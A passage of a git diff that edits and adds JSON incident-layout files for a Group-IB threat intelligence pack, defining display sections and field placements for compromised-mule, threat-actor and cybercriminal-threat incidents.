1, - "x": 1, - "y": 1 + "x": 2, + "y": 4 }, { - "h": 3, - "i": "default-main-sources", + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, "moved": false, - "name": "Sources Data", + "name": "Indicators", + "query": "", + "queryType": "input", "static": false, - "type": "sources", + "type": "indicators", "w": 2, "x": 0, - "y": 8 + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 53, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 53, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 53, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 53, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 53, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 7 }, { "displayType": "ROW", - "h": 1, - "i": "default-main-e2c8c970-a09d-11e9-8956-390f602b039b", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, "items": [ { "endCol": 2, - "fieldId": "firstseen", + "fieldId": "dbotclosed", "height": 22, - "id": "indicator-first-seen", + "id": "incident-dbotClosed-field", "index": 0, "sectionItemType": "field", "startCol": 0 }, { "endCol": 2, - "fieldId": "lastseen", + "fieldId": "closereason", "height": 22, - "id": "indicator-last-seen", + "id": "incident-closeReason-field", "index": 1, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 } ], + "maxW": 3, "moved": false, - "name": "Related Incidents", + "name": "Closing Information", "static": false, - "w": 2, + "w": 1, "x": 0, - "y": 5 + "y": 11 }, { - "displayType": "ROW", + "displayType": "CARD", "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 3, "hideName": false, - "i": "default-main-98041610-7373-11eb-8aef-c39e29f029fe", + "i": "caseinfoid-ceb57b30-71a4-11ef-8c49-f9d8b5e80cf6", "items": [ { + "dropEffect": "move", "endCol": 4, - "fieldId": "creationdate", + "fieldId": "gibid", "height": 22, - "id": "d40f6d70-7379-11eb-8aef-c39e29f029fe", + "id": "ec29eac0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 0, + "listId": "caseinfoid-ceb57b30-71a4-11ef-8c49-f9d8b5e80cf6", "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibmalwarename", + "fieldId": "gibcompromisedaccount", "height": 22, - "id": "b149e530-7375-11eb-8aef-c39e29f029fe", + "id": "91a41bb0-7bf5-11ef-96a8-77b28953dd87", "index": 1, "sectionItemType": "field", "startCol": 0 }, { - "dropEffect": "move", "endCol": 4, - "fieldId": "gibid", + "fieldId": "gibdatahash", "height": 22, - "id": "ad5d41b0-7375-11eb-8aef-c39e29f029fe", + "id": "f23b1bf0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 2, - "listId": "default-main-98041610-7373-11eb-8aef-c39e29f029fe", "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "source", + "fieldId": "gibdateadd", "height": 22, - "id": "2f1064e0-737a-11eb-8aef-c39e29f029fe", + "id": "f8a17200-71a4-11ef-8c49-f9d8b5e80cf6", "index": 3, "sectionItemType": "field", "startCol": 0 }, { "endCol": 4, - "fieldId": "gibcollection", + "fieldId": "gibdateincident", "height": 22, - "id": "36f4e490-737c-11eb-8aef-c39e29f029fe", + "id": "ff7e7eb0-71a4-11ef-8c49-f9d8b5e80cf6", "index": 4, "sectionItemType": "field", "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationbic", + "height": 22, + "id": "0bc55900-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationbsb", + "height": 22, + "id": "1197d380-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationiban", + "height": 22, + "id": "42bc6480-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationname", + "height": 22, + "id": "48ba5bd0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationswift", + "height": 22, + "id": "4e2e89b0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "giborganizationclabe", + "height": 22, + "id": "53aec580-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "508b68e0-8492-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 } ], "maxW": 3, "minH": 1, - "minW": 1, "moved": false, - "name": "Information from GIB TIA", + "name": "Information from Group-IB", "static": false, "w": 2, "x": 0, - "y": 3 + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-d0dfd540-71a4-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "69511a00-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "6ee8fc80-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "74e0d950-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "7a3b8bc0-71a5-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 0, + "y": 2 } ], "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" } ] - }, - "name": "GIB Compromised Mule Layout", - "system": false, - "version": -1, - "fromVersion": "6.0.0" + } } \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json new file mode 100644 index 000000000000..2324efaec1fc --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Actor_Layout.json @@ -0,0 +1,529 @@ +{ + "description": "Layout for GIB Cybercriminal Threat Actor", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 11 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 9 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 7 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 11 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 7 + }, + { + "displayType": "ROW", + "h": 3, + "hideName": false, + "i": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "c0996780-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatactoraliases", + "height": 22, + "id": "c32fc9d0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatactordescription", + "height": 44, + "id": "d6014b10-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": "dba589a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibthreatactorname", + "height": 22, + "id": "de28d920-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalexpertises", + "height": 22, + "id": "e0d4e650-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalregions", + "height": 22, + "id": "e36a3730-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalsectors", + "height": 22, + "id": "e65c4e10-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalmalware", + "height": 22, + "id": "e9759c00-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "0cd5eca0-8493-11ef-87c7-cfae65ac92d0", + "index": 9, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-41c673e0-7bfa-11ef-96a8-77b28953dd87", + "items": [ + { + "endCol": 2, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "c8522e30-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibdateupdatedat", + "height": 22, + "id": "cad22250-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "ce214d50-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "d172c240-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "listId": "caseinfoid-b1e55dc0-71ab-11ef-8c49-f9d8b5e80cf6", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Dates", + "static": false, + "w": 1, + "x": 0, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-23c2f320-822e-11ef-9517-e9064fff04ea", + "items": [ + { + "dropEffect": "move", + "endCol": 2, + "fieldId": "gibcybercriminalthreatactorreportstable", + "height": 106, + "id": "302f56d0-822e-11ef-9517-e9064fff04ea", + "index": 0, + "listId": "caseinfoid-23c2f320-822e-11ef-9517-e9064fff04ea", + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Threat Actor Reports", + "static": false, + "w": 1, + "x": 1, + "y": 2 + } + ], + "type": "custom" + }, + { + "id": "warRoom", + "name": "War Room", + "type": "warRoom" + }, + { + "id": "workPlan", + "name": "Work Plan", + "type": "workPlan" + }, + { + "id": "evidenceBoard", + "name": "Evidence Board", + "type": "evidenceBoard" + }, + { + "id": "relatedIncidents", + "name": "Related Incidents", + "type": "relatedIncidents" + }, + { + "id": "canvas", + "name": "Canvas", + "type": "canvas" + } + ] + }, + "group": "incident", + "id": "GIB Cybercriminal Threat Actor Layout", + "name": "GIB Cybercriminal Threat Actor Layout", + "system": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json new file mode 100644 index 000000000000..4746e85599cb --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/Layouts/layoutscontainer-GIB_Cybercriminal_Threat_Layout.json @@ -0,0 +1,591 @@ +{ + "description": "Layout for GIB Cybercriminal Threat", + "detailsV2": { + "tabs": [ + { + "id": "summary", + "name": "Legacy Summary", + "type": "summary" + }, + { + "id": "caseinfoid", + "name": "Incident Info", + "sections": [ + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-fce71720-98b0-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "type", + "height": 22, + "id": "incident-type-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "severity", + "height": 22, + "id": "incident-severity-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "owner", + "height": 22, + "id": "incident-owner-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourcebrand", + "height": 22, + "id": "incident-sourceBrand-field", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "sourceinstance", + "height": 22, + "id": "incident-sourceInstance-field", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "playbookid", + "height": 22, + "id": "incident-playbookId-field", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Case Details", + "static": false, + "w": 1, + "x": 0, + "y": 0 + }, + { + "h": 2, + "i": "caseinfoid-61263cc0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Notes", + "static": false, + "type": "notes", + "w": 1, + "x": 2, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-6aabad20-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Work Plan", + "static": false, + "type": "workplan", + "w": 1, + "x": 1, + "y": 0 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-770ec200-98b1-11e9-97d7-ed26ef9e46c8", + "isVisible": true, + "maxW": 3, + "moved": false, + "name": "Linked Incidents", + "static": false, + "type": "linkedIncidents", + "w": 1, + "x": 1, + "y": 14 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-842632c0-98b1-11e9-97d7-ed26ef9e46c8", + "maxW": 3, + "moved": false, + "name": "Child Incidents", + "static": false, + "type": "childInv", + "w": 1, + "x": 2, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-4a31afa0-98ba-11e9-a519-93a53c759fe0", + "maxW": 3, + "moved": false, + "name": "Evidence", + "static": false, + "type": "evidence", + "w": 1, + "x": 2, + "y": 2 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-7717e580-9bed-11e9-9a3f-8b4b2158e260", + "maxW": 3, + "moved": false, + "name": "Team Members", + "static": false, + "type": "team", + "w": 1, + "x": 2, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-7ce69dd0-a07f-11e9-936c-5395a1acf11e", + "maxW": 3, + "moved": false, + "name": "Indicators", + "query": "", + "queryType": "input", + "static": false, + "type": "indicators", + "w": 2, + "x": 0, + "y": 12 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-ac32f620-a0b0-11e9-b27f-13ae1773d289", + "items": [ + { + "endCol": 1, + "fieldId": "occurred", + "height": 22, + "id": "incident-occurred-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 1, + "fieldId": "dbotmodified", + "height": 22, + "id": "incident-modified-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotduedate", + "height": 22, + "id": "incident-dueDate-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "dbotcreated", + "height": 22, + "id": "incident-created-field", + "index": 0, + "sectionItemType": "field", + "startCol": 1 + }, + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-closed-field", + "index": 1, + "sectionItemType": "field", + "startCol": 1 + } + ], + "maxW": 3, + "moved": false, + "name": "Timeline Information", + "static": false, + "w": 1, + "x": 0, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "i": "caseinfoid-88e6bf70-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "dbotclosed", + "height": 22, + "id": "incident-dbotClosed-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closereason", + "height": 22, + "id": "incident-closeReason-field", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "closenotes", + "height": 22, + "id": "incident-closeNotes-field", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Closing Information", + "static": false, + "w": 1, + "x": 0, + "y": 14 + }, + { + "displayType": "CARD", + "h": 2, + "i": "caseinfoid-e54b1770-a0b1-11e9-b27f-13ae1773d289", + "isVisible": true, + "items": [ + { + "endCol": 2, + "fieldId": "details", + "height": 22, + "id": "incident-details-field", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "moved": false, + "name": "Investigation Data", + "static": false, + "w": 1, + "x": 1, + "y": 10 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-311327e0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibadmiraltycode", + "height": 22, + "id": "4ff160a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibcredibility", + "height": 22, + "id": "52d100f0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibreliability", + "height": 22, + "id": "55932e30-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibseverity", + "height": 22, + "id": "57f428a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Evaluation", + "static": false, + "w": 1, + "x": 1, + "y": 2 + }, + { + "displayType": "ROW", + "h": 4, + "hideName": false, + "i": "caseinfoid-31ce88a0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibid", + "height": 22, + "id": "6efb8b60-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreattitle", + "height": 22, + "id": "71d908d0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalthreatdescription", + "height": 44, + "id": "7565d910-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 2, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatecreatedat", + "height": 22, + "id": "77d1d000-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 3, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatefirstseen", + "height": 22, + "id": "7a5c2460-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 4, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibdatelastseen", + "height": 22, + "id": "7edd18a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 5, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibistailored", + "height": 22, + "id": "8220f900-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 6, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalexpertises", + "height": 22, + "id": "8567e6a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 7, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalregions", + "height": 22, + "id": "8bb33aa0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 8, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibcybercriminalsectors", + "height": 22, + "id": "8f6c4b00-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 9, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibreportnumber", + "height": 22, + "id": "921ff950-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 10, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 4, + "fieldId": "gibportallink", + "height": 22, + "id": "fa2b7b60-8492-11ef-87c7-cfae65ac92d0", + "index": 11, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Information from Group-IB", + "static": false, + "w": 2, + "x": 0, + "y": 6 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-357b6400-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 4, + "fieldId": "gibcybercriminalforumstable", + "height": 106, + "id": "17921b70-8176-11ef-84bc-e146948281c8", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + } + ], + "maxW": 3, + "minH": 1, + "moved": false, + "name": "Group-IB Cybercriminal Forum Information", + "static": false, + "w": 2, + "x": 0, + "y": 4 + }, + { + "displayType": "ROW", + "h": 2, + "hideName": false, + "i": "caseinfoid-36403aa0-71ab-11ef-8c49-f9d8b5e80cf6", + "items": [ + { + "endCol": 2, + "fieldId": "gibthreatactorcountry", + "height": 22, + "id": "417752a0-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 0, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorid", + "height": 22, + "id": "43fb1750-71ab-11ef-8c49-f9d8b5e80cf6", + "index": 1, + "sectionItemType": "field", + "startCol": 0 + }, + { + "endCol": 2, + "fieldId": "gibthreatactorisapt", + "height": 22, + "id": 